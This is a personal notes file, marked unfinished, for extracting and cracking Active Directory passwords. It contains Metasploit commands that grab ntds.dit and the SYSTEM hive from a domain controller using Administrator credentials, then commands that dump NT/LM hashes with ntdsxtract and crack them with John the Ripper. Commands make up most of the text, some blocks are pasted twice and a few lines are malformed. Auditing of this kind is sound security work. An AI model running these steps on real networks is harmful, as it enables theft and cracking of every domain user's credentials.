UNSORTED/SECURITY/NOT FINISHED - ad password extractor
#!/bin/bash
# Active Directory passwords
#libesedb
wget https://github.com/libyal/libesedb/releases/download/20170121/libesedb-experimental-20170121.tar.gz
tar xvzf libesedb-experimental-20170121.tar.gz
cd libesedb-20170121/
#ntdsextract
git clone https://github.com/csababarta/ntdsxtract.git
#john(as root)
wget http://openwall.info/wiki/_media/john/korelogic-rules-20100801-reworked-all-3k.txt >> /etc/john/john.conf
apt install -y make gcc git build-essential libssl-dev
https://gist.github.com/kerberis/36e948a7d04702ec361d
#/bin/bash
# Centos 7 John the Ripper Installation
yum -y install wget gpgme
yum -y group install "Development Tools"
cd
wget http://www.openwall.com/john/j/john-1.8.0.tar.xz
wget http://www.openwall.com/john/j/john-1.8.0.tar.xz.sign
wget http://www.openwall.com/signatures/openwall-signatures.asc
gpg --import openwall-signatures.asc
gpg --verify john-1.8.0.tar.xz.sign
tar xvfj john-1.8.0.tar.xz
cd john-1.8.0/src
make clean linux-x86-64
cd ../run/
./john --test
#password dictionnary download
wget -O - http://mirrors.kernel.org/openwall/wordlists/all.gz | gunzip -c > openwall.dico
Ajout par moi
/etc/john/john.conf
sudo msfconsole
msf > use auxiliary/admin/smb/psexec_ntdsgrab
msf auxiliary(psexec_ntdsgrab) > show options
set RHOST <DC_CTRL_IP>
msf auxiliary(psexec_ntdsgrab) > set SMBDomain <DOMAIN_NAME>
msf auxiliary(psexec_ntdsgrab) > set SMBPass ########
msf auxiliary(psexec_ntdsgrab) > set SMBUser Administrateur
run (twice)
(remember the path of the downloaded files)
ntds.dit stored at /root/.msf4/loot/20210311084120_default_<DC_CTRL_IP>_psexec.ntdsgrab._773375.dit
SYSTEM hive stored at /root/.msf4/loot/20210311084131_default_<DC_CTRL_IP>_psexec.ntdsgrab._817994.bin
<USER>@laptop:/usr/local/src/libesedb-20210121/esedbtools$ ./esedbexport -t ~/ntds /root/.msf4/loot/20210311084120_default_<DC_CTRL_IP>_psexec.ntdsgrab._773375.dit
cd ~/ntds.export/
<USER>@laptop:~/ntds.export$ python /usr/local/src/ntdsxtract/dsusers.py datatable.3 link_table.5 extract/ --lmoutfile LM.out --ntoutfile NT.out --passwordhashes --pwdformat john --syshive /root/.msf4/loot/20210311084131_default_<DC_CTRL_IP>_psexec.ntdsgrab._817994.bin
cat extract/NT.out
# fork for as many CPU you haves
sudo john --rules=all --fork=4 extract/NT.out
CURRENT USAGE (11/2021)
[root@] run # ./john --format=nt --fork=7 /root/ntlm-extract.ntds
https://gist.github.com/kerberis/36e948a7d04702ec361d
#/bin/bash
# Centos 7 John the Ripper Installation
yum -y install wget gpgme
yum -y group install "Development Tools"
cd
wget http://www.openwall.com/john/j/john-1.8.0.tar.xz
wget http://www.openwall.com/john/j/john-1.8.0.tar.xz.sign
wget http://www.openwall.com/signatures/openwall-signatures.asc
gpg --import openwall-signatures.asc
gpg --verify john-1.8.0.tar.xz.sign
tar xvfJ john-1.8.0.tar.xz
cd john-1.8.0/src
make clean linux-x86-64
cd ../run/
./john --test
#password dictionnary download
wget -O - http://mirrors.kernel.org/openwall/wordlists/all.gz | gunzip -c > openwall.dico
This will place us in ~/john-1.8.0/run
wget http://openwall.info/wiki/_media/john/korelogic-rules-20100801-reworked-all-3k.txt >> john.conf
mkdir work-dir
# Put the NT.out file here
https://adamdoupe.com/publications/black-box-scanners-dimva2010.pdf
https://www.aldeid.com/wiki/WackoPicko
https://securityinabox.org
https://bkimminich.gitbooks.io/pwning-owasp-juice-shop/content/introduction/architecture.html